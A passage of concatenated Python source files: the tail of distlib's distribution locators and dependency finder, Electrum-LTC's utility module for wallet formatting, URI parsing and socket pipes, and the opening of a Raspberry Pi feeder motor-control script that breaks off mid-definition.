data.decode(encoding) except UnicodeError: data = data.decode('latin-1') # fallback result = Page(data, final_url) self._page_cache[final_url] = result except HTTPError as e: if e.code != 404: logger.exception('Fetch failed: %s: %s', url, e) except URLError as e: logger.exception('Fetch failed: %s: %s', url, e) with self._lock: self._bad_hosts.add(host) except Exception as e: logger.exception('Fetch failed: %s: %s', url, e) finally: self._page_cache[url] = result # even if None (failure) return result _distname_re = re.compile('<a href=[^>]*>([^<]+)<') def get_distribution_names(self): """ Return all the distribution names known to this locator. """ result = set() page = self.get_page(self.base_url) if not page: raise DistlibException('Unable to get %s' % self.base_url) for match in self._distname_re.finditer(page.data): result.add(match.group(1)) return result class DirectoryLocator(Locator): """ This class locates distributions in a directory tree. """ def __init__(self, path, **kwargs): """ Initialise an instance. :param path: The root of the directory tree to search. :param kwargs: Passed to the superclass constructor, except for: * recursive - if True (the default), subdirectories are recursed into. If False, only the top-level directory is searched, """ self.recursive = kwargs.pop('recursive', True) super(DirectoryLocator, self).__init__(**kwargs) path = os.path.abspath(path) if not os.path.isdir(path): raise DistlibException('Not a directory: %r' % path) self.base_dir = path def should_include(self, filename, parent): """ Should a filename be considered as a candidate for a distribution archive? As well as the filename, the directory which contains it is provided, though not used by the current implementation. """ return filename.endswith(self.downloadable_extensions) def _get_project(self, name): result = {} for root, dirs, files in os.walk(self.base_dir): for fn in files: if self.should_include(fn, root): fn = os.path.join(root, fn) url = urlunparse(('file', '', pathname2url(os.path.abspath(fn)), '', '', '')) info = self.convert_url_to_download_info(url, name) if info: self._update_version_data(result, info) if not self.recursive: break return result def get_distribution_names(self): """ Return all the distribution names known to this locator. """ result = set() for root, dirs, files in os.walk(self.base_dir): for fn in files: if self.should_include(fn, root): fn = os.path.join(root, fn) url = urlunparse(('file', '', pathname2url(os.path.abspath(fn)), '', '', '')) info = self.convert_url_to_download_info(url, None) if info: result.add(info['name']) if not self.recursive: break return result class JSONLocator(Locator): """ This locator uses special extended metadata (not available on PyPI) and is the basis of performant dependency resolution in distlib. Other locators require archive downloads before dependencies can be determined! As you might imagine, that can be slow. """ def get_distribution_names(self): """ Return all the distribution names known to this locator. """ raise NotImplementedError('Not available from this locator') def _get_project(self, name): result = {} data = get_project_data(name) if data: for info in data.get('files', []): if info['ptype'] != 'sdist' or info['pyversion'] != 'source': continue # We don't store summary in project metadata as it makes # the data bigger for no benefit during dependency # resolution dist = make_dist(data['name'], info['version'], summary=data.get('summary', 'Placeholder for summary'), scheme=self.scheme) md = dist.metadata md.source_url = info['url'] # TODO SHA256 digest if 'digest' in info and info['digest']: dist.digest = ('md5', info['digest']) md.dependencies = info.get('requirements', {}) dist.exports = info.get('exports', {}) result[dist.version] = dist return result class DistPathLocator(Locator): """ This locator finds installed distributions in a path. It can be useful for adding to an :class:`AggregatingLocator`. """ def __init__(self, distpath, **kwargs): """ Initialise an instance. :param distpath: A :class:`DistributionPath` instance to search. """ super(DistPathLocator, self).__init__(**kwargs) assert isinstance(distpath, DistributionPath) self.distpath = distpath def _get_project(self, name): dist = self.distpath.get_distribution(name) if dist is None: result = {} else: result = { dist.version: dist } return result class AggregatingLocator(Locator): """ This class allows you to chain and/or merge a list of locators. """ def __init__(self, *locators, **kwargs): """ Initialise an instance. :param locators: The list of locators to search. :param kwargs: Passed to the superclass constructor, except for: * merge - if False (the default), the first successful search from any of the locators is returned. If True, the results from all locators are merged (this can be slow). """ self.merge = kwargs.pop('merge', False) self.locators = locators super(AggregatingLocator, self).__init__(**kwargs) def clear_cache(self): super(AggregatingLocator, self).clear_cache() for locator in self.locators: locator.clear_cache() def _set_scheme(self, value): self._scheme = value for locator in self.locators: locator.scheme = value scheme = property(Locator.scheme.fget, _set_scheme) def _get_project(self, name): result = {} for locator in self.locators: d = locator.get_project(name) if d: if self.merge: result.update(d) else: # See issue #18. If any dists are found and we're looking # for specific constraints, we only return something if # a match is found. For example, if a DirectoryLocator # returns just foo (1.0) while we're looking for # foo (>= 2.0), we'll pretend there was nothing there so # that subsequent locators can be queried. Otherwise we # would just return foo (1.0) which would then lead to a # failure to find foo (>= 2.0), because other locators # weren't searched. Note that this only matters when # merge=False. if self.matcher is None: found = True else: found = False for k in d: if self.matcher.match(k): found = True break if found: result = d break return result def get_distribution_names(self): """ Return all the distribution names known to this locator. """ result = set() for locator in self.locators: try: result |= locator.get_distribution_names() except NotImplementedError: pass return result # We use a legacy scheme simply because most of the dists on PyPI use legacy # versions which don't conform to PEP 426 / PEP 440. default_locator = AggregatingLocator( JSONLocator(), SimpleScrapingLocator('https://pypi.python.org/simple/', timeout=3.0), scheme='legacy') locate = default_locator.locate NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*' r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$') class DependencyFinder(object): """ Locate dependencies for distributions. """ def __init__(self, locator=None): """ Initialise an instance, using the specified locator to locate distributions. """ self.locator = locator or default_locator self.scheme = get_scheme(self.locator.scheme) def add_distribution(self, dist): """ Add a distribution to the finder. This will update internal information about who provides what. :param dist: The distribution to add. """ logger.debug('adding distribution %s', dist) name = dist.key self.dists_by_name[name] = dist self.dists[(name, dist.version)] = dist for p in dist.provides: name, version = parse_name_and_version(p) logger.debug('Add to provided: %s, %s, %s', name, version, dist) self.provided.setdefault(name, set()).add((version, dist)) def remove_distribution(self, dist): """ Remove a distribution from the finder. This will update internal information about who provides what. :param dist: The distribution to remove. """ logger.debug('removing distribution %s', dist) name = dist.key del self.dists_by_name[name] del self.dists[(name, dist.version)] for p in dist.provides: name, version = parse_name_and_version(p) logger.debug('Remove from provided: %s, %s, %s', name, version, dist) s = self.provided[name] s.remove((version, dist)) if not s: del self.provided[name] def get_matcher(self, reqt): """ Get a version matcher for a requirement. :param reqt: The requirement :type reqt: str :return: A version matcher (an instance of :class:`distlib.version.Matcher`). """ try: matcher = self.scheme.matcher(reqt) except UnsupportedVersionError: # XXX compat-mode if cannot read the version name = reqt.split()[0] matcher = self.scheme.matcher(name) return matcher def find_providers(self, reqt): """ Find the distributions which can fulfill a requirement. :param reqt: The requirement. :type reqt: str :return: A set of distribution which can fulfill the requirement. """ matcher = self.get_matcher(reqt) name = matcher.key # case-insensitive result = set() provided = self.provided if name in provided: for version, provider in provided[name]: try: match = matcher.match(version) except UnsupportedVersionError: match = False if match: result.add(provider) break return result def try_to_replace(self, provider, other, problems): """ Attempt to replace one provider with another. This is typically used when resolving dependencies from multiple sources, e.g. A requires (B >= 1.0) while C requires (B >= 1.1). For successful replacement, ``provider`` must meet all the requirements which ``other`` fulfills. :param provider: The provider we are trying to replace with. :param other: The provider we're trying to replace. :param problems: If False is returned, this will contain what problems prevented replacement. This is currently a tuple of the literal string 'cantreplace', ``provider``, ``other`` and the set of requirements that ``provider`` couldn't fulfill. :return: True if we can replace ``other`` with ``provider``, else False. """ rlist = self.reqts[other] unmatched = set() for s in rlist: matcher = self.get_matcher(s) if not matcher.match(provider.version): unmatched.add(s) if unmatched: # can't replace other with provider problems.add(('cantreplace', provider, other, unmatched)) result = False else: # can replace other with provider self.remove_distribution(other) del self.reqts[other] for s in rlist: self.reqts.setdefault(provider, set()).add(s) self.add_distribution(provider) result = True return result def find(self, requirement, meta_extras=None, prereleases=False): """ Find a distribution and all distributions it depends on. :param requirement: The requirement specifying the distribution to find, or a Distribution instance. :param meta_extras: A list of meta extras such as :test:, :build: and so on. :param prereleases: If ``True``, allow pre-release versions to be returned - otherwise, don't return prereleases unless they're all that's available. Return a set of :class:`Distribution` instances and a set of problems. The distributions returned should be such that they have the :attr:`required` attribute set to ``True`` if they were from the ``requirement`` passed to ``find()``, and they have the :attr:`build_time_dependency` attribute set to ``True`` unless they are post-installation dependencies of the ``requirement``. The problems should be a tuple consisting of the string ``'unsatisfied'`` and the requirement which couldn't be satisfied by any distribution known to the locator. """ self.provided = {} self.dists = {} self.dists_by_name = {} self.reqts = {} meta_extras = set(meta_extras or []) if ':*:' in meta_extras: meta_extras.remove(':*:') # :meta: and :run: are implicitly included meta_extras |= set([':test:', ':build:', ':dev:']) if isinstance(requirement, Distribution): dist = odist = requirement logger.debug('passed %s as requirement', odist) else: dist = odist = self.locator.locate(requirement, prereleases=prereleases) if dist is None: raise DistlibException('Unable to locate %r' % requirement) logger.debug('located %s', odist) dist.requested = True problems = set() todo = set([dist]) install_dists = set([odist]) while todo: dist = todo.pop() name = dist.key # case-insensitive if name not in self.dists_by_name: self.add_distribution(dist) else: #import pdb; pdb.set_trace() other = self.dists_by_name[name] if other != dist: self.try_to_replace(dist, other, problems) ireqts = dist.run_requires | dist.meta_requires sreqts = dist.build_requires ereqts = set() if dist in install_dists: for key in ('test', 'build', 'dev'): e = ':%s:' % key if e in meta_extras: ereqts |= getattr(dist, '%s_requires' % key) all_reqts = ireqts | sreqts | ereqts for r in all_reqts: providers = self.find_providers(r) if not providers: logger.debug('No providers found for %r', r) provider = self.locator.locate(r, prereleases=prereleases) # If no provider is found and we didn't consider # prereleases, consider them now. if provider is None and not prereleases: provider = self.locator.locate(r, prereleases=True) if provider is None: logger.debug('Cannot satisfy %r', r) problems.add(('unsatisfied', r)) else: n, v = provider.key, provider.version if (n, v) not in self.dists: todo.add(provider) providers.add(provider) if r in ireqts and dist in install_dists: install_dists.add(provider) logger.debug('Adding %s to install_dists', provider.name_and_version) for p in providers: name = p.key if name not in self.dists_by_name: self.reqts.setdefault(p, set()).add(r) else: other = self.dists_by_name[name] if other != p: # see if other can be replaced by p self.try_to_replace(p, other, problems) dists = set(self.dists.values()) for dist in dists: dist.build_time_dependency = dist not in install_dists if dist.build_time_dependency: logger.debug('%s is a build-time dependency only.', dist.name_and_version) logger.debug('find done for %s', odist) return dists, problems
util.py
# Electrum - lightweight Bitcoin client # Copyright (C) 2011 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import binascii import os, sys, re, json from collections import defaultdict from datetime import datetime import decimal from decimal import Decimal import traceback import urllib import threading import hmac from .i18n import _ import urllib.request, urllib.parse, urllib.error import queue def inv_dict(d): return {v: k for k, v in d.items()} base_units = {'LTC':8, 'mLTC':5, 'uLTC':2, 'sat':0} base_units_inverse = inv_dict(base_units) base_units_list = ['LTC', 'mLTC', 'uLTC', 'sat'] # list(dict) does not guarantee order def decimal_point_to_base_unit_name(dp: int) -> str: # e.g. 8 -> "BTC" try: return base_units_inverse[dp] except KeyError: raise Exception('Unknown base unit') def base_unit_name_to_decimal_point(unit_name: str) -> int: # e.g. "BTC" -> 8 try: return base_units[unit_name] except KeyError: raise Exception('Unknown base unit') def normalize_version(v): return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")] class NotEnoughFunds(Exception): pass class NoDynamicFeeEstimates(Exception): def __str__(self): return _('Dynamic fee estimates not available') class InvalidPassword(Exception): def __str__(self): return _("Incorrect password") class FileImportFailed(Exception): def __init__(self, message=''): self.message = str(message) def __str__(self): return _("Failed to import from file.") + "\n" + self.message class FileExportFailed(Exception): def __init__(self, message=''): self.message = str(message) def __str__(self): return _("Failed to export to file.") + "\n" + self.message class TimeoutException(Exception): def __init__(self, message=''): self.message = str(message) def __str__(self): if not self.message: return _("Operation timed out.") return self.message class WalletFileException(Exception): pass class BitcoinException(Exception): pass # Throw this exception to unwind the stack like when an error occurs. # However unlike other exceptions the user won't be informed. class UserCancelled(Exception): '''An exception that is suppressed from the user''' pass class Satoshis(object): def __new__(cls, value): self = super(Satoshis, cls).__new__(cls) self.value = value return self def __repr__(self): return 'Satoshis(%d)'%self.value def __str__(self): return format_satoshis(self.value) + " LTC" class Fiat(object): def __new__(cls, value, ccy): self = super(Fiat, cls).__new__(cls) self.ccy = ccy self.value = value return self def __repr__(self): return 'Fiat(%s)'% self.__str__() def __str__(self): if self.value.is_nan(): return _('No Data') else: return "{:.2f}".format(self.value) + ' ' + self.ccy class MyEncoder(json.JSONEncoder): def default(self, obj): from .transaction import Transaction if isinstance(obj, Transaction): return obj.as_dict() if isinstance(obj, Satoshis): return str(obj) if isinstance(obj, Fiat): return str(obj) if isinstance(obj, Decimal): return str(obj) if isinstance(obj, datetime): return obj.isoformat(' ')[:-3] return super(MyEncoder, self).default(obj) class PrintError(object): '''A handy base class''' def diagnostic_name(self): return self.__class__.__name__ def print_error(self, *msg): # only prints with --verbose flag print_error("[%s]" % self.diagnostic_name(), *msg) def print_stderr(self, *msg): print_stderr("[%s]" % self.diagnostic_name(), *msg) def print_msg(self, *msg): print_msg("[%s]" % self.diagnostic_name(), *msg) class ThreadJob(PrintError): """A job that is run periodically from a thread's main loop. run() is called from that thread's context. """ def run(self): """Called periodically from the thread""" pass class DebugMem(ThreadJob): '''A handy class for debugging GC memory leaks''' def __init__(self, classes, interval=30): self.next_time = 0 self.classes = classes self.interval = interval def mem_stats(self): import gc self.print_error("Start memscan") gc.collect() objmap = defaultdict(list) for obj in gc.get_objects(): for class_ in self.classes: if isinstance(obj, class_): objmap[class_].append(obj) for class_, objs in objmap.items(): self.print_error("%s: %d" % (class_.__name__, len(objs))) self.print_error("Finish memscan") def run(self): if time.time() > self.next_time: self.mem_stats() self.next_time = time.time() + self.interval class DaemonThread(threading.Thread, PrintError): """ daemon thread that terminates cleanly """ def __init__(self): threading.Thread.__init__(self) self.parent_thread = threading.currentThread() self.running = False self.running_lock = threading.Lock() self.job_lock = threading.Lock() self.jobs = [] def add_jobs(self, jobs): with self.job_lock: self.jobs.extend(jobs) def run_jobs(self): # Don't let a throwing job disrupt the thread, future runs of # itself, or other jobs. This is useful protection against # malformed or malicious server responses with self.job_lock: for job in self.jobs: try: job.run() except Exception as e: traceback.print_exc(file=sys.stderr) def remove_jobs(self, jobs): with self.job_lock: for job in jobs: self.jobs.remove(job) def start(self): with self.running_lock: self.running = True return threading.Thread.start(self) def is_running(self): with self.running_lock: return self.running and self.parent_thread.is_alive() def stop(self): with self.running_lock: self.running = False def on_stop(self): if 'ANDROID_DATA' in os.environ: import jnius jnius.detach() self.print_error("jnius detach") self.print_error("stopped") # TODO: disable is_verbose = True def set_verbosity(b): global is_verbose is_verbose = b def print_error(*args): if not is_verbose: return print_stderr(*args) def print_stderr(*args): args = [str(item) for item in args] sys.stderr.write(" ".join(args) + "\n") sys.stderr.flush() def print_msg(*args): # Stringify args args = [str(item) for item in args] sys.stdout.write(" ".join(args) + "\n") sys.stdout.flush() def json_encode(obj): try: s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder) except TypeError: s = repr(obj) return s def json_decode(x): try: return json.loads(x, parse_float=Decimal) except: return x # taken from Django Source Code def constant_time_compare(val1, val2): """Return True if the two strings are equal, False otherwise.""" return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8')) # decorator that prints execution time def profiler(func): def do_profile(func, args, kw_args): n = func.__name__ t0 = time.time() o = func(*args, **kw_args) t = time.time() - t0 print_error("[profiler]", n, "%.4f"%t) return o return lambda *args, **kw_args: do_profile(func, args, kw_args) def android_ext_dir(): import jnius env = jnius.autoclass('android.os.Environment') return env.getExternalStorageDirectory().getPath() def android_data_dir(): import jnius PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity') return PythonActivity.mActivity.getFilesDir().getPath() + '/data' def android_headers_dir(): d = android_ext_dir() + '/org.electrum_ltc.electrum_ltc' if not os.path.exists(d): os.mkdir(d) return d def android_check_data_dir(): """ if needed, move old directory to sandbox """ ext_dir = android_ext_dir() data_dir = android_data_dir() old_electrum_dir = ext_dir + '/electrum-ltc' if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir): import shutil new_headers_path = android_headers_dir() + '/blockchain_headers' old_headers_path = old_electrum_dir + '/blockchain_headers' if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path): print_error("Moving headers file to", new_headers_path) shutil.move(old_headers_path, new_headers_path) print_error("Moving data to", data_dir) shutil.move(old_electrum_dir, data_dir) return data_dir def get_headers_dir(config): return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path def assert_datadir_available(config_path): path = config_path if os.path.exists(path): return else: raise FileNotFoundError( 'Electrum datadir does not exist. Was it deleted while running?' + '\n' + 'Should be at {}'.format(path)) def assert_file_in_datadir_available(path, config_path): if os.path.exists(path): return else: assert_datadir_available(config_path) raise FileNotFoundError( 'Cannot find file but datadir is there.' + '\n' + 'Should be at {}'.format(path)) def assert_bytes(*args): """ porting helper, assert args type """ try: for x in args: assert isinstance(x, (bytes, bytearray)) except: print('assert bytes failed', list(map(type, args))) raise def assert_str(*args): """ porting helper, assert args type """ for x in args: assert isinstance(x, str) def to_string(x, enc): if isinstance(x, (bytes, bytearray)): return x.decode(enc) if isinstance(x, str): return x else: raise TypeError("Not a string or bytes like object") def to_bytes(something, encoding='utf8'): """ cast string to bytes() like object, but for python2 support it's bytearray copy """ if isinstance(something, bytes): return something if isinstance(something, str): return something.encode(encoding) elif isinstance(something, bytearray): return bytes(something) else: raise TypeError("Not a string or bytes like object") bfh = bytes.fromhex hfu = binascii.hexlify def bh2u(x): """ str with hex representation of a bytes-like object >>> x = bytes((1, 2, 10)) >>> bh2u(x) '01020A' :param x: bytes :rtype: str """ return hfu(x).decode('ascii') def user_dir(): if 'ANDROID_DATA' in os.environ: return android_check_data_dir() elif os.name == 'posix': return os.path.join(os.environ["HOME"], ".electrum-ltc") elif "APPDATA" in os.environ: return os.path.join(os.environ["APPDATA"], "Electrum-LTC") elif "LOCALAPPDATA" in os.environ: return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-LTC") else: #raise Exception("No home directory found in environment variables.") return def format_satoshis_plain(x, decimal_point = 8): """Display a satoshi amount scaled. Always uses a '.' as a decimal point and has no thousands separator""" scale_factor = pow(10, decimal_point) return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.') def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False): from locale import localeconv if x is None: return 'unknown' if precision is None: precision = decimal_point decimal_format = ".0" + str(precision) if precision > 0 else "" if is_diff: decimal_format = '+' + decimal_format result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0') integer_part, fract_part = result.split(".") dp = localeconv()['decimal_point'] if len(fract_part) < num_zeros: fract_part += "0" * (num_zeros - len(fract_part)) result = integer_part + dp + fract_part if whitespaces: result += " " * (decimal_point - len(fract_part)) result = " " * (15 - len(result)) + result return result FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates _feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION) def format_fee_satoshis(fee, num_zeros=0): return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION) def quantize_feerate(fee): """Strip sat/byte fee rate of excess precision.""" if fee is None: return None return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN) def timestamp_to_datetime(timestamp): if timestamp is None: return None return datetime.fromtimestamp(timestamp) def format_time(timestamp): date = timestamp_to_datetime(timestamp) return date.isoformat(' ')[:-3] if date else _("Unknown") # Takes a timestamp and returns a string with the approximation of the age def age(from_date, since_date = None, target_tz=None, include_seconds=False): if from_date is None: return "Unknown" from_date = datetime.fromtimestamp(from_date) if since_date is None: since_date = datetime.now(target_tz) td = time_difference(from_date - since_date, include_seconds) return td + " ago" if from_date < since_date else "in " + td def time_difference(distance_in_time, include_seconds): #distance_in_time = since_date - from_date distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds))) distance_in_minutes = int(round(distance_in_seconds/60)) if distance_in_minutes <= 1: if include_seconds: for remainder in [5, 10, 20]: if distance_in_seconds < remainder: return "less than %s seconds" % remainder if distance_in_seconds < 40: return "half a minute" elif distance_in_seconds < 60: return "less than a minute" else: return "1 minute" else: if distance_in_minutes == 0: return "less than a minute" else: return "1 minute" elif distance_in_minutes < 45: return "%s minutes" % distance_in_minutes elif distance_in_minutes < 90: return "about 1 hour" elif distance_in_minutes < 1440: return "about %d hours" % (round(distance_in_minutes / 60.0)) elif distance_in_minutes < 2880: return "1 day" elif distance_in_minutes < 43220: return "%d days" % (round(distance_in_minutes / 1440)) elif distance_in_minutes < 86400: return "about 1 month" elif distance_in_minutes < 525600: return "%d months" % (round(distance_in_minutes / 43200)) elif distance_in_minutes < 1051200: return "about 1 year" else: return "over %d years" % (round(distance_in_minutes / 525600)) mainnet_block_explorers = { 'Bchain.info': ('https://bchain.info/', {'tx': 'LTC/tx/', 'addr': 'LTC/addr/'}), 'BlockCypher.com': ('https://live.blockcypher.com/ltc/', {'tx': 'tx/', 'addr': 'address/'}), 'explorer.litecoin.net': ('http://explorer.litecoin.net/', {'tx': 'tx/', 'addr': 'address/'}), 'LiteCore': ('https://insight.litecore.io/', {'tx': 'tx/', 'addr': 'address/'}), 'SoChain': ('https://chain.so/', {'tx': 'tx/LTC/', 'addr': 'address/LTC/'}), 'system default': ('blockchain://12a765e31ffd4059bada1e25190f6e98c99d9714d334efa41a195a7e7e04bfe2/', {'tx': 'tx/', 'addr': 'address/'}), } testnet_block_explorers = { 'LiteCore': ('https://testnet.litecore.io/', {'tx': 'tx/', 'addr': 'address/'}), 'SoChain': ('https://chain.so/', {'tx': 'tx/LTCTEST/', 'addr': 'address/LTCTEST/'}), 'system default': ('blockchain://4966625a4b2851d9fdee139e56211a0d88575f59ed816ff5e6a63deb4e3e29a0/', {'tx': 'tx/', 'addr': 'address/'}), } def block_explorer_info(): from . import constants return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers def block_explorer(config): return config.get('block_explorer', 'LiteCore') def block_explorer_tuple(config): return block_explorer_info().get(block_explorer(config)) def block_explorer_URL(config, kind, item): be_tuple = block_explorer_tuple(config) if not be_tuple: return kind_str = be_tuple[1].get(kind) if not kind_str: return url_parts = [be_tuple[0], kind_str, item] return ''.join(url_parts) # URL decode #_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE) #urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x) def parse_URI(uri, on_pr=None): from . import bitcoin from .bitcoin import COIN if ':' not in uri: if not bitcoin.is_address(uri): raise Exception("Not a Litecoin address") return {'address': uri} u = urllib.parse.urlparse(uri) if u.scheme != 'litecoin': raise Exception("Not a litecoin URI") address = u.path # python for android fails to parse query if address.find('?') > 0: address, query = u.path.split('?') pq = urllib.parse.parse_qs(query) else: pq = urllib.parse.parse_qs(u.query) for k, v in pq.items(): if len(v)!=1: raise Exception('Duplicate Key', k) out = {k: v[0] for k, v in pq.items()} if address: if not bitcoin.is_address(address): raise Exception("Invalid Litecoin address:" + address) out['address'] = address if 'amount' in out: am = out['amount'] m = re.match('([0-9\.]+)X([0-9])', am) if m: k = int(m.group(2)) - 8 amount = Decimal(m.group(1)) * pow( Decimal(10) , k) else: amount = Decimal(am) * COIN out['amount'] = int(amount) if 'message' in out: out['message'] = out['message'] out['memo'] = out['message'] if 'time' in out: out['time'] = int(out['time']) if 'exp' in out: out['exp'] = int(out['exp']) if 'sig' in out: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58)) r = out.get('r') sig = out.get('sig') name = out.get('name') if on_pr and (r or (name and sig)): def get_payment_request_thread(): from . import paymentrequest as pr if name and sig: s = pr.serialize_request(out).SerializeToString() request = pr.PaymentRequest(s) else: request = pr.get_payment_request(r) if on_pr: on_pr(request) t = threading.Thread(target=get_payment_request_thread) t.setDaemon(True) t.start() return out def create_URI(addr, amount, message): from . import bitcoin if not bitcoin.is_address(addr): return "" query = [] if amount: query.append('amount=%s'%format_satoshis_plain(amount)) if message: query.append('message=%s'%urllib.parse.quote(message)) p = urllib.parse.ParseResult(scheme='litecoin', netloc='', path=addr, params='', query='&'.join(query), fragment='') return urllib.parse.urlunparse(p) # Python bug (http://bugs.python.org/issue1927) causes raw_input # to be redirected improperly between stdin/stderr on Unix systems #TODO: py3 def raw_input(prompt=None): if prompt: sys.stdout.write(prompt) return builtin_raw_input() import builtins builtin_raw_input = builtins.input builtins.input = raw_input def parse_json(message): # TODO: check \r\n pattern n = message.find(b'\n') if n==-1: return None, message try: j = json.loads(message[0:n].decode('utf8')) except: j = None return j, message[n+1:] class timeout(Exception): pass import socket import json import ssl import time class SocketPipe: def __init__(self, socket): self.socket = socket self.message = b'' self.set_timeout(0.1) self.recv_time = time.time() def set_timeout(self, t): self.socket.settimeout(t) def idle_time(self): return time.time() - self.recv_time def get(self): while True: response, self.message = parse_json(self.message) if response is not None: return response try: data = self.socket.recv(1024) except socket.timeout: raise timeout except ssl.SSLError: raise timeout except socket.error as err: if err.errno == 60: raise timeout elif err.errno in [11, 35, 10035]: print_error("socket errno %d (resource temporarily unavailable)"% err.errno) time.sleep(0.2) raise timeout else: print_error("pipe: socket error", err) data = b'' except: traceback.print_exc(file=sys.stderr) data = b'' if not data: # Connection closed remotely return None self.message += data self.recv_time = time.time() def send(self, request): out = json.dumps(request) + '\n' out = out.encode('utf8') self._send(out) def send_all(self, requests): out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests)) self._send(out) def _send(self, out): while out: try: sent = self.socket.send(out) out = out[sent:] except ssl.SSLError as e: print_error("SSLError:", e) time.sleep(0.1) continue class QueuePipe: def __init__(self, send_queue=None, get_queue=None): self.send_queue = send_queue if send_queue else queue.Queue() self.get_queue = get_queue if get_queue else queue.Queue() self.set_timeout(0.1) def get(self): try: return self.get_queue.get(timeout=self.timeout) except queue.Empty: raise timeout def get_all(self): responses = [] while True: try: r = self.get_queue.get_nowait() responses.append(r) except queue.Empty: break return responses def set_timeout(self, t): self.timeout = t def send(self, request): self.send_queue.put(request) def send_all(self, requests): for request in requests: self.send(request) def setup_thread_excepthook(): """ Workaround for `sys.excepthook` thread bug from: http://bugs.python.org/issue1230540 Call once from the main thread before creating any threads. """ init_original = threading.Thread.__init__ def init(self, *args, **kwargs): init_original(self, *args, **kwargs) run_original = self.run def run_with_except_hook(*args2, **kwargs2): try: run_original(*args2, **kwargs2) except Exception: sys.excepthook(*sys.exc_info()) self.run = run_with_except_hook threading.Thread.__init__ = init def versiontuple(v): return tuple(map(int, (v.split(".")))) def import_meta(path, validater, load_meta): try: with open(path, 'r', encoding='utf-8') as f: d = validater(json.loads(f.read())) load_meta(d) #backwards compatibility for JSONDecodeError except ValueError: traceback.print_exc(file=sys.stderr) raise FileImportFailed(_("Invalid JSON code.")) except BaseException as e: traceback.print_exc(file=sys.stdout) raise FileImportFailed(e) def export_meta(meta, fileName): try: with open(fileName, 'w+', encoding='utf-8') as f: json.dump(meta, f, indent=4, sort_keys=True) except (IOError, os.error) as e: traceback.print_exc(file=sys.stderr) raise FileExportFailed(e)
feeder.py
import json import math import os.path import sys import threading import time import RPi.GPIO as GPIO from gpiozero import MCP3008 from enum import Enum # Constants PWM_FREQUENCY = 50 FLIPS = 6 ANTI_FLIP_MAX = 0.88 ANTI_FLIP_TIME = 0.33 CLOCK_FLIP_MAX = 0.8 CLOCK_FLIP_TIME = 0.3 WIGGLES = 6 ANTI_WIGGLE_TIME = 0.3 # 0.36 CLOCK_WIGGLE_TIME = 0.3 FED_TIMEOUT_SECS = 10 EMPTY_TIME = 1.5 LOW_POWER_SECS = 30 HIGH_POWER_SECS = 90 EMPTY_TEST_SECS = 180 JIGGLE_INTERVAL = 15 DEBUG_PIN = 6 # 31 GPIO.setup(DEBUG_PIN, GPIO.OUT) GPIO.output(DEBUG_PIN, False) class MotorState(Enum): START = 0 LEFTWIGGLE = 1 RIGHTWIGGLE = 2 LEFT = 3 RIGHT = 4 LEFTEMPTY = 5 RIGHTEMPTY = 6 COMPLETE = 7 class Feeder: def __init__(self, name, pwmpin, resetpin, adcchannel, clockwise, anticlockwise, verbose): self.name = name self.empty = False self.running = False self.resetSettings() self.resetCalibration() self.resetpin = resetpin GPIO.setup(self.resetpin, GPIO.OUT) # Keep high to reduce current, power GPIO.output(self.resetpin, True) self.pwmpin = pwmpin GPIO.setup(pwmpin, GPIO.OUT) self.pwm = GPIO.PWM(pwmpin, PWM_FREQUENCY) self.pwm.start(0) self.motorstate = MotorState.START self.motorstatecounter = 0 self.adcchannel = adcchannel self.adc = MCP3008(channel=adcchannel, device=0) self.adcevent = threading.Event() self.motorevent = threading.Event() self.clockwise = clockwise self.anticlockwise = anticlockwise self.verbose = verbose self.load() def setupStates(self): self.states = { MotorState.START: { "pwm": 0, "duration": 0, "repeat": 0, "right": True, "fn": self.stateStart }, MotorState.LEFTWIGGLE: { "pwm": self.anticlockwise, "duration": ANTI_WIGGLE_TIME, "repeat": WIGGLES, "right": False, "fn": self.stateWiggle }, MotorState.RIGHTWIGGLE: { "pwm": self.clockwise, "duration": CLOCK_WIGGLE_TIME, "repeat": WIGGLES, "right": True, "fn": self.stateWiggle }, MotorState.LEFT: { "pwm": self.anticlockwise, "duration": ANTI_FLIP_TIME, "repeat": FLIPS, "right": False, "fn": self.stateFlip }, MotorState.RIGHT: { "pwm": self.clockwise, "duration": 